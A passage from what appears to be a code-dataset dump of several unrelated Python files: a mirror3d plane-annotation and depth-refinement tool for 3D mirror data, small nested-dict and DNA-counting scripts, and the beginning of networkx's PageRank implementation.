self.to_anno_sample_index += 1\n elif input_option == \"exit\":\n self.save_progress(annotation_progress_save_folder)\n self.get_progress(input_txt, annotation_progress_save_folder)\n print(\"current progress {} / {}\".format(self.to_anno_sample_index, len(self.anno_info_list)))\n refer_speed = (time.time() - annotation_start_time) / (\n self.to_anno_sample_index - annotation_start_index)\n left_h = ((len(self.anno_info_list) - self.to_anno_sample_index) * refer_speed) / 3600\n manual_percentage = (manual_adjust_num / (self.to_anno_sample_index - annotation_start_index)) * 100\n print(\"Reference annotation speed {:.2f} s/sample; \"\n \"Estimate remaining time {:.1f} h; manual adjust {:.2f}%\"\n .format(refer_speed, left_h, manual_percentage))\n exit(1)\n elif \"back\" in input_option:\n n = int(input_option.split()[1]) - 1\n if self.to_anno_sample_index - n < 0:\n print(\"at most return {} times\".format(self.to_anno_sample_index + 1))\n continue\n self.to_anno_sample_index -= n\n elif \"goto\" in input_option:\n n = int(input_option.split()[1]) - 1\n if n > len(self.anno_info_list) - 1:\n print(\"you can go to 0 ~ {}\".format(len(self.anno_info_list) - 1))\n continue\n self.to_anno_sample_index = n\n elif input_option == \"a\":\n instance_mask = (cv2.imread(mask_path, cv2.IMREAD_ANYDEPTH) == instance_id).astype(np.uint8)\n mirror_pcd = get_mirrorPoint_based_on_plane_parameter(f, plane_parameter=plane_parameter,\n mirror_mask=instance_mask,\n color_img_path=color_img_path, color=[1, 1, 0])\n init_step_size = ((np.max(np.array(pcd.points)[:, 0])) - (np.min(np.array(pcd.points)[:, 0]))) / 300\n while 1:\n min_adjust_option_list = ToolOption()\n min_adjust_option_list.add_option(\"f\", \"FINISH : update refined_sensorD/ refined_meshD/ img_info \"\n \"and EXIT\")\n min_adjust_option_list.add_option(\"a\", \"ADJUST : adjust the plane parameter based on current \"\n \"plane parameter\")\n min_adjust_option_list.add_option(\"i\", \"INIT : pick 3 points to initialize the plane (press shift \"\n \"+ left click to select a point; press shirt + right click \"\n \"to unselect; for more detail please refer to Open3d \"\n \"instruction)\")\n min_adjust_option_list.print_option()\n min_input_option = input()\n\n if min_input_option not in [\"f\", \"i\", \"a\"]:\n print(\"invalid input, please input again :D\")\n continue\n\n if min_input_option == \"f\":\n update_plane_parameter_json(plane_parameter, plane_parameter_output_path, instance_id)\n manual_adjust_num += 1\n self.correct_pcd_list.append(current_pcd_path)\n self.save_progress(annotation_progress_save_folder)\n self.get_progress(input_txt, annotation_progress_save_folder)\n break\n elif min_input_option == \"i\":\n [p1, p2, p3] = get_picked_points(pcd)\n plane_parameter = get_parameter_from_plane_adjustment(\n pcd, get_mirror_init_plane_from_3points(p1, p2, p3), init_step_size)\n mirror_pcd = get_mirrorPoint_based_on_plane_parameter(f, plane_parameter=plane_parameter,\n mirror_mask=instance_mask,\n color_img_path=color_img_path,\n color=[1, 1, 0])\n o3d.visualization.draw_geometries([pcd, mirror_pcd])\n\n elif min_input_option == \"a\":\n p1 = np.mean(np.array(mirror_pcd.points), axis=0)\n p2 = np.array(mirror_pcd.points)[0]\n p3 = np.array(mirror_pcd.points)[-1]\n if not mirror_plane:\n mirror_plane = get_mirror_init_plane_from_3points(p1, p2, p3)\n plane_parameter = get_parameter_from_plane_adjustment(pcd, mirror_plane, init_step_size)\n mirror_pcd = get_mirrorPoint_based_on_plane_parameter(f, plane_parameter=plane_parameter,\n mirror_mask=instance_mask,\n color_img_path=color_img_path,\n color=[1, 1, 0])\n o3d.visualization.draw_geometries([pcd, mirror_pcd])\n\n def get_and_check_focal_length(self, f, line):\n try:\n f = int(f)\n return f\n except:\n print(\"{} invalid focal length format\".format(f))\n print(\"please check line: \", line)\n exit()\n\n def anno_update_depth_from_img_info(self, input_txt):\n \"\"\"\n After plane annotation, update \"raw_sensorD/raw_meshD\" to \"refined_sensorD/refined_meshD\"\n\n Output:\n Refined depth saved to refined_sensorD or refined_meshD (Matterport3d only).\n \"\"\"\n process_list = self.get_list_to_process(read_txt(input_txt))\n for item in process_list:\n if len(item.strip().split()) != 5:\n continue\n rawD_path, mask_img_path, plane_parameter_json_path, refD_output_path, f = item.strip().split()\n if not os.path.exists(rawD_path) or not os.path.exists(mask_img_path) or not os.path.exists(\n plane_parameter_json_path):\n print(\"invalid line : \", item)\n print(\"input txt format: [path to depth map to refine (rawD)] [input integer mask path] [plane \"\n \"parameter JSON output path] [path to save the refined depth map (refD)] [focal length of this \"\n \"sample]\")\n continue\n f = self.get_and_check_focal_length(f, item)\n\n os.makedirs(os.path.split(refD_output_path)[0], exist_ok=True)\n mask = cv2.imread(mask_img_path, cv2.IMREAD_ANYDEPTH)\n info = read_json(plane_parameter_json_path)\n valid_instance = False\n for one_info in info:\n instance_index = one_info[\"mask_id\"]\n binary_instance_mask = (mask == instance_index).astype(np.uint8)\n plane_parameter = one_info[\"plane\"]\n cv2.imwrite(refD_output_path,\n refine_depth_with_plane_parameter_mask(plane_parameter, binary_instance_mask,\n cv2.imread(rawD_path, cv2.IMREAD_ANYDEPTH), f))\n print(\"update depth {}\".format(refD_output_path))\n\n def data_clamping(self, input_txt, expand_range=100, clamp_dis=100, border_width=25):\n \"\"\"\n Clamp data based on 3D bbox\n\n Output:\n Clamped depth : saved to refined_sensorD or mesh_refined depth under self.data_main_folder\n \"\"\"\n import open3d as o3d\n process_list = self.get_list_to_process(read_txt(input_txt))\n for item in process_list:\n if len(item.strip().split()) != 5:\n continue\n refD_path, mask_img_path, plane_parameter_json_path, clamped_refD_path, f = item.strip().split()\n if not os.path.exists(refD_path) or not os.path.exists(mask_img_path) or not os.path.exists(\n plane_parameter_json_path):\n print(\"invalid line : \", item)\n print(\"input txt format: [path to depth map to the unclamped refine (rawD)] [input integer mask path] \"\n \"[plane parameter JSON output path] [path to save the clamped refined depth map (refD)] [focal \"\n \"length of this sample]\")\n continue\n f = self.get_and_check_focal_length(f, item)\n mask = cv2.imread(mask_img_path, cv2.IMREAD_ANYDEPTH)\n for instance_index in np.unique(mask):\n if instance_index == 0:\n continue # background\n\n # Get mirror_border_mask\n instance_mask = (mask == instance_index).astype(np.uint8)\n mirror_border_mask = cv2.dilate(instance_mask, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (\n border_width, border_width))) - cv2.erode(instance_mask,\n cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10, 10)))\n\n # Get mirror_bbox\n mirror_points = get_points_in_mask(f=f, depth_img_path=refD_path, mirror_mask=instance_mask)\n mirror_pcd = o3d.geometry.PointCloud()\n mirror_pcd.points = o3d.utility.Vector3dVector(np.stack(mirror_points, axis=0))\n mirror_bbox = o3d.geometry.OrientedBoundingBox.create_from_points(\n o3d.utility.Vector3dVector(np.stack(mirror_points, axis=0)))\n\n # Get plane parameter\n plane_parameter = read_plane_json(plane_parameter_json_path)[instance_index][\"plane_parameter\"]\n\n # Refine hole raw depth\n os.makedirs(os.path.split(clamped_refD_path)[0], exist_ok=True)\n cv2.imwrite(clamped_refD_path, clamp_pcd_by_bbox(mirror_bbox=mirror_bbox, depth_img_path=refD_path, f=f,\n mirror_border_mask=mirror_border_mask,\n plane_parameter=plane_parameter,\n expand_range=expand_range, clamp_dis=clamp_dis))\n print(\"update depth {}\".format(clamped_refD_path))\n\n def generate_pcdMesh_for_vis(self, input_txt):\n \"\"\"\n Generate \"point cloud\" + \"mesh plane\" for specific sample\n\n Output:\n \"point cloud\" + \"mesh plane\" : Saved under self.output_folder.\n \"\"\"\n\n import open3d as o3d\n import itertools\n\n # Pack as a function to better support Matterport3d ply generation\n def generate_and_save_ply(color_img_path, depth_img_path, mask_img_path, plane_parameter_json_path,\n pcd_save_folder, mesh_save_folder, f):\n os.makedirs(pcd_save_folder, exist_ok=True)\n os.makedirs(mesh_save_folder, exist_ok=True)\n\n mask = cv2.imread(mask_img_path, cv2.IMREAD_ANYDEPTH)\n # Get pcd and masked RGB image for each instance\n for instance_index in np.unique(mask):\n if instance_index == 0: # background\n continue\n save_name = color_img_path.split(\"/\")[-1].split(\".\")[0] + \"_idx_\" + str(instance_index)\n mesh_save_path = os.path.join(mesh_save_folder, \"{}.ply\".format(save_name))\n pcd_save_path = os.path.join(pcd_save_folder, \"{}.ply\".format(save_name))\n binary_instance_mask = (mask == instance_index).astype(np.uint8)\n plane_parameter = read_plane_json(plane_parameter_json_path)[instance_index][\"plane_parameter\"]\n\n if os.path.exists(pcd_save_path) and os.path.exists(mesh_save_path) and not self.overwrite:\n print(pcd_save_path, mesh_save_path, \"exist! continue\")\n return\n\n # Get pcd for the instance\n pcd = get_pcd_from_rgbd_depthPath(f, depth_img_path, color_img_path, mirror_mask=binary_instance_mask, color=[0, 0.2, 0.6])\n\n # Get mirror plane for the instance\n mirror_points = get_points_in_mask(f, depth_img_path, mirror_mask=binary_instance_mask)\n mirror_pcd = o3d.geometry.PointCloud()\n mirror_pcd.points = o3d.utility.Vector3dVector(np.stack(mirror_points, axis=0))\n if np.array(mirror_pcd.voxel_down_sample(voxel_size=500).points).shape[0] < 30:\n mirror_bbox =mirror_pcd.voxel_down_sample(voxel_size=100).get_oriented_bounding_box()\n else:\n mirror_bbox =mirror_pcd.voxel_down_sample(voxel_size=500).get_oriented_bounding_box()\n mirror_plane = get_mirror_init_plane_from_mirrorbbox(plane_parameter, mirror_bbox)\n o3d.io.write_point_cloud(pcd_save_path, pcd)\n print(\"point cloud saved to :\", os.path.abspath(pcd_save_path))\n\n o3d.io.write_triangle_mesh(mesh_save_path, mirror_plane)\n print(\"mirror plane (mesh) saved to :\", os.path.abspath(mesh_save_path))\n\n process_list = self.get_list_to_process(read_txt(input_txt))\n for item in process_list:\n if len(item.strip().split()) != 7:\n continue\n color_img_path, depth_img_path, mask_img_path, plane_parameter_json_path, \\\n pcd_save_folder, mesh_save_folder, f = item.strip().split()\n if not os.path.exists(color_img_path) or not os.path.exists(depth_img_path) or not os.path.exists(\n plane_parameter_json_path):\n print(\"invalid line : \", item)\n print(\"input txt format: [input color image path] [input depth image path] [input integer mask path] \"\n \"[plane parameter JSON path] [folder to save the output pointcloud] [folder to save the output \"\n \"mesh plane] [focal length of this sample]\")\n continue\n f = self.get_and_check_focal_length(f, item)\n generate_and_save_ply(color_img_path, depth_img_path, mask_img_path, plane_parameter_json_path,\n pcd_save_folder, mesh_save_folder, f)\n\n def set_view_mode(self, view_mode):\n \"\"\"Function to save the view mode\"\"\"\n self.view_mode = view_mode\n\n @staticmethod\n def rotate_pcd_mesh_topdown(screenshot_output_folder, pcd, plane, above_height=3000):\n \"\"\"\n Rotate the \"pcd + mesh\" by topdown view\n\n Output:\n Screenshots png\n \"\"\"\n import open3d as o3d\n\n screenshot_id = 0\n mesh_center = np.mean(np.array(plane.vertices), axis=0)\n rotation_step_degree = 10\n start_rotation = get_extrinsic(90, 0, 0, [0, 0, 0])\n step_translation = get_extrinsic(0, 0, 0, [-mesh_center[0], -mesh_center[1] + above_height, -mesh_center[2]])\n start_position = np.dot(start_rotation, step_translation)\n\n def rotate_view(vis):\n nonlocal screenshot_id\n t_rotate = get_extrinsic(0, rotation_step_degree * (screenshot_id + 1), 0, [0, 0, 0])\n cam = vis.get_view_control().convert_to_pinhole_camera_parameters()\n cam.extrinsic = np.dot(np.dot(start_rotation, t_rotate), step_translation)\n vis.get_view_control().convert_from_pinhole_camera_parameters(cam)\n\n screenshot_id += 1\n screenshot_save_path = os.path.join(screenshot_output_folder, \"{0:05d}.png\".format(screenshot_id))\n vis.capture_screen_image(filename=screenshot_save_path, do_render=True)\n print(\"image saved to {}\".format(screenshot_save_path))\n if screenshot_id > (360 / rotation_step_degree):\n vis.destroy_window()\n return False\n\n vis = o3d.visualization.VisualizerWithKeyCallback()\n vis.register_animation_callback(rotate_view)\n vis.create_window(width=800, height=800)\n vis.get_render_option().point_size = 1.0\n vis.add_geometry(pcd)\n vis.add_geometry(plane)\n cam = vis.get_view_control().convert_to_pinhole_camera_parameters()\n cam.extrinsic = start_position\n vis.get_view_control().convert_from_pinhole_camera_parameters(cam)\n vis.run()\n\n @staticmethod\n def rotate_pcd_mesh_front(screenshot_output_folder, pcd, plane):\n \"\"\"\n Rotate the \"pcd + mesh\" by front view\n\n Output:\n Screenshots png\n \"\"\"\n import open3d as o3d\n\n screenshot_id = 0\n mesh_center = np.mean(np.array(plane.vertices), axis=0)\n rotation_step_degree = 10\n start_position = get_extrinsic(0, 0, 0, [0, 0, 3000])\n\n def rotate_view(vis):\n nonlocal screenshot_id\n t_to_center = get_extrinsic(0, 0, 0, mesh_center)\n t_rotate = get_extrinsic(0, rotation_step_degree * (screenshot_id + 1), 0, [0, 0, 0])\n t_to_mesh = get_extrinsic(0, 0, 0, -mesh_center)\n cam = vis.get_view_control().convert_to_pinhole_camera_parameters()\n cam.extrinsic = np.dot(start_position, np.dot(np.dot(t_to_center, t_rotate), t_to_mesh))\n vis.get_view_control().convert_from_pinhole_camera_parameters(cam)\n\n screenshot_id += 1\n screenshot_save_path = os.path.join(screenshot_output_folder, \"{0:05d}.png\".format(screenshot_id))\n vis.capture_screen_image(filename=screenshot_save_path, do_render=True)\n print(\"image saved to {}\".format(screenshot_save_path))\n if screenshot_id > (360 / rotation_step_degree):\n vis.destroy_window()\n return False\n\n vis = o3d.visualization.VisualizerWithKeyCallback()\n vis.register_animation_callback(rotate_view)\n vis.create_window(width=800, height=800)\n vis.get_render_option().point_size = 1.0\n vis.add_geometry(pcd)\n vis.add_geometry(plane)\n cam = vis.get_view_control().convert_to_pinhole_camera_parameters()\n cam.extrinsic = start_position\n vis.get_view_control().convert_from_pinhole_camera_parameters(cam)\n vis.run()\n\n def generate_video_screenshot_from_3Dobject(self, input_txt, above_height=3000):\n \"\"\"\n Generate \"pcd + mesh\"'s screenshots\n\n Args:\n self.view_mode : str; \"topdown\" / \"front\".\n\n Output:\n screenshots png\n \"\"\"\n import open3d as o3d\n\n def generate_video_ffmpeg(one_video_save_path, one_screenshot_output_folder):\n os.makedirs(os.path.split(one_video_save_path)[0], exist_ok=True)\n try:\n start_time = time.time()\n if os.path.exists(one_video_save_path):\n if not self.overwrite:\n print(\"{} video exists!\".format(one_video_save_path))\n return\n else:\n os.remove(one_video_save_path)\n command = \"ffmpeg -f image2 -i \" + one_screenshot_output_folder + \"/%05d.png \" + one_video_save_path\n os.system(command)\n print(\"video saved to {}, used time :{}\".format(one_video_save_path, time.time() - start_time))\n except:\n print(\"error saving video for :\", one_screenshot_output_folder)\n\n def generate_screenshot(pcd_path, mesh_path, screenshot_output_folder):\n\n pcd = o3d.io.read_point_cloud(pcd_path)\n mirror_plane = o3d.io.read_triangle_mesh(mesh_path)\n os.makedirs(screenshot_output_folder, exist_ok=True)\n\n if len(os.listdir(screenshot_output_folder)) == 37 and not self.overwrite:\n print(\"screenshots for {} exist ! continue\".format(pcd_path))\n return\n\n if self.view_mode == \"topdown\":\n topdown_folder = os.path.join(screenshot_output_folder, \"topdown\")\n os.makedirs(topdown_folder, exist_ok=True)\n self.rotate_pcd_mesh_topdown(topdown_folder, pcd, mirror_plane, above_height)\n else:\n front_folder = os.path.join(screenshot_output_folder, \"front\")\n os.makedirs(front_folder, exist_ok=True)\n self.rotate_pcd_mesh_front(front_folder, pcd, mirror_plane)\n\n process_list = self.get_list_to_process(read_txt(input_txt))\n for item in process_list:\n if len(item.strip().split()) != 3:\n continue\n pcd_path, mesh_path, screenshot_output_folder = item.strip().split()\n if not os.path.exists(pcd_path) or not os.path.exists(mesh_path):\n print(\"invalid line : \", item)\n print(\"input txt format: [path to pointcloud] [path to mesh plane] [screenshot output main folder]\")\n continue\n generate_screenshot(pcd_path, mesh_path, screenshot_output_folder)\n if self.view_mode == \"topdown\":\n topdown_folder = os.path.join(screenshot_output_folder, \"topdown\")\n video_save_path = os.path.join(screenshot_output_folder,\n \"topdown_{}_.mp4\".format(os.path.split(mesh_path)[-1].split(\".\")[0]))\n generate_video_ffmpeg(video_save_path, topdown_folder)\n else:\n front_folder = os.path.join(screenshot_output_folder, \"front\")\n video_save_path = os.path.join(screenshot_output_folder,\n \"front_{}_.mp4\".format(os.path.split(mesh_path)[-1].split(\".\")[0]))\n generate_video_ffmpeg(video_save_path, front_folder)\n\n def gen_verification_html(self, input_txt, video_num_per_page, html_output_folder):\n\n template_path = \"mirror3d/visualization/template/veri_template.html\"\n os.makedirs(html_output_folder, exist_ok=True)\n process_list_temp = self.get_list_to_process(read_txt(input_txt))\n process_list = []\n for item in process_list_temp:\n if len(item.strip().split()) != 5:\n continue\n sample_id, color_img_path, colored_depth_path, front_video_path, topdown_video_path = item.strip().split()\n if not os.path.exists(color_img_path) or not os.path.exists(colored_depth_path) or not os.path.exists(\n front_video_path) or not os.path.exists(topdown_video_path):\n print(\"invalid line : \", item)\n print(\"input txt format: [sample id] [input color image path] [colored depth map saved path] [front \"\n \"view video path] [topdown view video path]\")\n continue\n\n process_list.append(item.strip().split())\n process_sub_list = [process_list[x:x + video_num_per_page] for x in\n range(0, len(process_list), video_num_per_page)]\n for html_index, process_sub in enumerate(process_sub_list):\n\n with open(template_path) as inf:\n txt = inf.read()\n soup = bs4.BeautifulSoup(txt, features=\"html.parser\")\n\n new_table = soup.new_tag(\"table\")\n new_table[\"style\"] = \"width: 100%%; margin-left: auto; margin-right: auto;\"\n soup.body.div.append(new_table)\n\n # add heading \n heading_tag = [\"ID\", \"Color Image\", \"Depth Image\", \"Top-down View Pointcloud\", \"Front View Pointcloud\"]\n heading = soup.new_tag(\"tr\")\n\n for item_index, tag in enumerate(heading_tag):\n one_heading = soup.new_tag(\"td\")\n text = soup.new_tag(\"p\")\n text.string = tag\n text[\"style\"] = \"text-align: center;\"\n one_heading.append(text)\n heading.append(one_heading)\n new_table.append(heading)\n for one_sub_info in process_sub:\n sample_id, color_img_path, colored_depth_path, front_video_path, topdown_video_path = one_sub_info\n\n # append sample_id\n new_tr = soup.new_tag(\"tr\")\n sample_id_box = soup.new_tag(\"td\")\n text = soup.new_tag(\"p\")\n text.string = sample_id\n text[\"style\"] = \"text-align: center; width:300px\"\n sample_id_box.append(text)\n new_tr.append(sample_id_box)\n\n # append color image to one line in HTML\n one_color_img = soup.new_tag(\"td\")\n one_color_img[\"class\"] = \"one-item\"\n img = soup.new_tag('img', src=os.path.relpath(color_img_path, html_output_folder))\n img[\"style\"] = \"max-height: 220px; width:100%;\"\n one_color_img.append(img)\n new_tr.append(one_color_img)\n\n # append colored depth image to one line in HTML\n one_color_img = soup.new_tag(\"td\")\n one_color_img[\"class\"] = \"one-item\"\n img = soup.new_tag('img', src=os.path.relpath(colored_depth_path, html_output_folder))\n img[\"style\"] = \"max-height: 220px; width:100%;\"\n one_color_img.append(img)\n new_tr.append(one_color_img)\n\n # add topdown video\n video_td = soup.new_tag(\"td\")\n video_td[\"class\"] = \"one-item\"\n one_video = soup.new_tag(\"video\")\n one_video[\"style\"] = \"max-height: 220px; width:100%;\"\n one_video[\"class\"] = \"lazy-video\"\n one_video[\"controls\"] = \"True\"\n one_video[\"autoplay\"] = \"True\"\n one_video[\"muted\"] = \"True\"\n one_video[\"loop\"] = \"True\"\n new_link = soup.new_tag(\"source\")\n new_link[\"data-src\"] = os.path.relpath(topdown_video_path, html_output_folder)\n new_link[\"type\"] = \"video/mp4\"\n one_video.append(new_link)\n video_td.append(one_video)\n new_tr.append(video_td)\n\n # add front video\n video_td = soup.new_tag(\"td\")\n video_td[\"class\"] = \"one-item\"\n one_video = soup.new_tag(\"video\")\n one_video[\"style\"] = \"max-height: 220px; width:100%;\"\n one_video[\"class\"] = \"lazy-video\"\n one_video[\"controls\"] = \"True\"\n one_video[\"autoplay\"] = \"True\"\n one_video[\"muted\"] = \"True\"\n one_video[\"loop\"] = \"True\"\n new_link = soup.new_tag(\"source\")\n new_link[\"data-src\"] = os.path.relpath(front_video_path, html_output_folder)\n new_link[\"type\"] = \"video/mp4\"\n one_video.append(new_link)\n video_td.append(one_video)\n new_tr.append(video_td)\n new_table.append(new_tr)\n\n html_path = os.path.join(html_output_folder, \"{}.html\".format(html_index))\n save_html(html_path, soup)\n print(\"html saved to :\", os.path.abspath(html_path))\n print(\"debug : \", html_path.replace(\"/project/3dlg-hcvc/mirrors/www\",\n \"https://aspis.cmpt.sfu.ca/projects/mirrors\"))\n\n def gen_colored_grayscale_for_depth(self, input_txt):\n \"\"\"\n Generate colored depth for one sample\n Output:\n colored depth image (using plt \"magma\" colormap)\n \"\"\"\n\n process_list = self.get_list_to_process(read_txt(input_txt))\n for item in process_list:\n if len(item.strip().split()) != 2:\n continue\n depth_path, colored_depth_output_path = item.strip().split()\n if not os.path.exists(depth_path):\n print(\"invalid line : \", item)\n print(\"input txt format: [input depth image path] [colored depth map saved path]\")\n continue\n os.makedirs(os.path.split(colored_depth_output_path)[0], exist_ok=True)\n save_heatmap_no_border(cv2.imread(depth_path, cv2.IMREAD_ANYDEPTH), colored_depth_output_path)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Get Setting :D')\n parser.add_argument(\n '--function', default=\"3\")\n parser.add_argument(\n '--coco_json', default=\"\")\n parser.add_argument(\n '--annotation_progress_save_folder', default=\"\",\n help=\"folder to save the plane annotation progress\")\n parser.add_argument(\n '--input_txt', default=\"\")\n parser.add_argument('--multi_processing', help='do multi-process or not', action='store_true')\n parser.add_argument('--overwrite', help='overwrite current result or not', action='store_true')\n parser.add_argument('--anno_show_plane', help='do multi-process or not', action='store_true')\n parser.add_argument(\n '--process_index', default=0, type=int, help=\"if do --multi_processing please input the process index\")\n parser.add_argument(\n '--border_width', default=25, type=int,\n help=\"border width of mirror; when setup annotation environment, specify a border with to run RANSAC on \"\n \"mirror border\")\n parser.add_argument(\n '--expand_range', default=200, type=int, help=\"expand the mirror instance bbox by expand_range; unit : mm\")\n parser.add_argument(\n '--clamp_dis', default=100, type=int, help=\"outliers threshold\")\n parser.add_argument(\n '--above_height', default=3000, type=int, help=\"camera height to the mirror plane center in the topdown view\")\n parser.add_argument(\n '--video_num_per_page', default=100, type=int)\n parser.add_argument(\n '--html_output_folder', default=\"\")\n parser.add_argument(\n '--view_mode', default=\"front\", help=\"object view angle : (1) topdown (2) front\")\n args = parser.parse_args()\n\n plane_anno_tool = PlaneAnnotationTool(process_index=args.process_index, multi_processing=args.multi_processing,\n overwrite=args.overwrite)\n\n if args.function == \"1\":\n print(\"input txt format: [color image filename in coco json] [integer mask output path] [RGB mask output path]\")\n plane_anno_tool.gen_int_mask_color_mask(args.coco_json, args.input_txt)\n elif args.function == \"2\":\n print(\"input txt format: [input integer mask path] [RGB mask output path]\")\n plane_anno_tool.gen_color_mask_from_int_mask(args.input_txt)\n elif args.function == \"3\":\n print(\"input txt format: [input integer mask path] [input refined depth path] [plane JSON file output path] [\"\n \"focal length of this sample]\")\n plane_anno_tool.update_plane_info_from_depth(args.input_txt)\n elif args.function == \"4\":\n print(\"input txt format: [input color image path] [input depth image path] [input integer mask path] [\"\n \"pointcloud output folder(pointcloud's name will be color image name + instance id)] [plane parameter \"\n \"JSON output path] [folder to save color image with mirror border mask] [focal length of this sample]\")\n plane_anno_tool.anno_env_setup(args.input_txt, args.border_width)\n elif args.function == \"5\":\n print(\"input txt format: [input color image path] [input depth image path] [input integer mask path] [\"\n \"instance pointcloud path] [plane parameter JSON output path] [path to the color image with mirror \"\n \"border mask] [focal length of this sample]\")\n plane_anno_tool.set_show_plane(args.anno_show_plane)\n plane_anno_tool.anno_plane_update_imgInfo(args.annotation_progress_save_folder, args.input_txt)\n elif args.function == \"6\":\n print(\"input txt format: [path to depth map to refine (rawD)] [input integer mask path] [plane parameter JSON \"\n \"output path] [path to save the refined depth map (refD)] [focal length of this sample]\")\n plane_anno_tool.anno_update_depth_from_img_info(args.input_txt)\n elif args.function == \"7\":\n print(\"input txt format: [path to depth map to the unclamped refine (rawD)] [input integer mask path] [plane \"\n \"parameter JSON output path] [path to save the clamped refined depth map (refD)] [focal length of this \"\n \"sample]\")\n plane_anno_tool.data_clamping(args.input_txt, args.expand_range, args.clamp_dis, args.border_width)\n elif args.function == \"8\":\n print(\"input txt format: [input color image path] [input depth image path] [input integer mask path] [plane \"\n \"parameter JSON path] [folder to save the output pointcloud] [folder to save the output mesh plane] [\"\n \"focal length of this sample]\")\n plane_anno_tool.generate_pcdMesh_for_vis(args.input_txt)\n elif args.function == \"9\":\n print(\"input txt format: [path to pointcloud] [path to mesh plane] [screenshot output main folder]\")\n plane_anno_tool.set_view_mode(\"topdown\")\n plane_anno_tool.generate_video_screenshot_from_3Dobject(args.input_txt, args.above_height)\n plane_anno_tool.set_view_mode(\"front\")\n plane_anno_tool.generate_video_screenshot_from_3Dobject(args.input_txt, args.above_height)\n elif args.function == \"10\":\n print(\"input txt format: [path to pointcloud] [path to mesh plane] [screenshot output main folder]\")\n plane_anno_tool.set_view_mode(args.view_mode)\n plane_anno_tool.generate_video_screenshot_from_3Dobject(args.input_txt, args.above_height)\n elif args.function == \"11\":\n print(\"input txt format: [input depth image path] [colored depth map saved path]\")\n plane_anno_tool.gen_colored_grayscale_for_depth(args.input_txt)\n elif args.function == \"12\":\n print(\"input txt format: [sample id] [input color image path] [colored depth map saved path] [front view \"\n \"video path] [topdown view video path]\")\n plane_anno_tool.gen_verification_html(args.input_txt, args.video_num_per_page, args.html_output_folder)\n","repo_name":"3dlg-hcvc/mirror3d","sub_path":"mirror3d/annotation/plane_annotation/plane_annotation_tool.py","file_name":"plane_annotation_tool.py","file_ext":"py","file_size_in_byte":52394,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"3"} +{"seq_id":"19529809449","text":"import collections\n\n\n# Working with nested data\n\ndef merge(d, u):\n if not d:\n return u\n if not u:\n return d\n for k, v in u.items():\n if isinstance(v, collections.Mapping):\n d[k] = merge(d.get(k, {}), v)\n else:\n d[k] = v\n return d\n\ndef get(_dict, keys, default=None):\n for key in keys:\n if isinstance(_dict, dict):\n _dict = _dict.get(key, default)\n else:\n return default\n return _dict","repo_name":"yuriizinets/tradehub","sub_path":"core/src/modules/nested_data.py","file_name":"nested_data.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"14867730261","text":"seq = input(\"Introduce the sequence: \")\na, c, g, t = 0, 0, 0, 0\nfor base in seq:\n if base == \"A\":\n a += 1\n elif base == \"C\":\n c += 1\n elif base == \"T\":\n t += 1\n elif base == \"G\":\n g += 1\n else:\n print(\"Not a valid sequence\")\n break\nprint(\"Total length:\", len(seq), \"\\nA:\", a, \"\\nC:\", c, \"\\nT:\", t, \"\\nG:\", g)","repo_name":"ClaireOnline/PNE_2021_Practices","sub_path":"Session-03/dna-count.py","file_name":"dna-count.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19235639192","text":"import networkx as nx\nfrom networkx.exception import NetworkXError\n__author__ = \"\"\"Aric Hagberg (hagberg@lanl.gov)\"\"\"\n__all__ = ['pagerank','pagerank_numpy','pagerank_scipy','google_matrix']\n\ndef pagerank(G,alpha=0.85,personalization=None,\n max_iter=100,tol=1.0e-8,nstart=None,weight='weight'):\n \"\"\"Return the PageRank of the nodes in the graph.\n\n PageRank computes a ranking of the nodes in the graph G based on\n the structure of the incoming links. It was originally designed as\n an algorithm to rank web pages.\n\n Parameters\n -----------\n G : graph\n A NetworkX graph\n\n alpha : float, optional\n Damping parameter for PageRank, default=0.85\n\n personalization: dict, optional\n The \"personalization vector\" consisting of a dictionary with a\n key for every graph node and nonzero personalization value for each node.\n\n max_iter : integer, optional\n Maximum number of iterations in power method eigenvalue solver.\n\n tol : float, optional\n Error tolerance used to check convergence in power method solver.\n\n nstart : dictionary, optional\n Starting value of PageRank iteration for each node.\n\n weight : key, optional\n Edge data key to use as weight. If None weights are set to 1.\n\n Returns\n -------\n pagerank : dictionary\n Dictionary of nodes with PageRank as value\n\n Examples\n --------\n >>> G=nx.DiGraph(nx.path_graph(4))\n >>> pr=nx.pagerank(G,alpha=0.9)\n\n Notes\n -----\n The eigenvector calculation is done by the power iteration method\n and has no guarantee of convergence. The iteration will stop\n after max_iter iterations or an error tolerance of\n number_of_nodes(G)*tol has been reached.\n\n The PageRank algorithm was designed for directed graphs but this\n algorithm does not check if the input graph is directed and will\n execute on undirected graphs by converting each oriented edge in the\n directed graph to two edges.\n\n See Also\n --------\n pagerank_numpy, pagerank_scipy, google_matrix\n\n References\n ----------\n .. [1] A. Langville and C. Meyer,\n \"A survey of eigenvector methods of web information retrieval.\"\n http://citeseer.ist.psu.edu/713792.html\n .. [2] Page, Lawrence; Brin, Sergey; Motwani, Rajeev and Winograd, Terry,\n The PageRank citation ranking: Bringing order to the Web. 1999\n http://dbpubs.stanford.edu:8090/pub/showDoc.Fulltext?lang=en&doc=1999-66&format=pdf\n \"\"\"\n if type(G) == nx.MultiGraph or type(G) == nx.MultiDiGraph:\n raise Exception(\"pagerank() not defined for graphs with multiedges.\")\n\n if len(G) == 0:\n return {}\n\n if not G.is_directed():\n D=G.to_directed()\n else:\n D=G\n\n # create a copy in (right) stochastic form\n W=nx.stochastic_graph(D, weight=weight)\n scale=1.0/W.number_of_nodes()\n\n # choose fixed starting vector if not given\n if nstart is None:\n x=dict.fromkeys(W,scale)\n else:\n x=nstart\n # normalize starting vector to 1\n s=1.0/sum(x.values())\n for k in x: x[k]*=s\n\n # assign uniform personalization/teleportation vector if not given\n if personalization is None:\n p=dict.fromkeys(W,scale)\n else:\n p=personalization\n # normalize starting vector to 1\n s=1.0/sum(p.values())\n for k in p:\n p[k]*=s\n if set(p)!=set(G):\n raise NetworkXError('Personalization vector '\n 'must have a value for every node')\n\n\n # \"dangling\" nodes, no links out from them\n out_degree=W.out_degree()\n 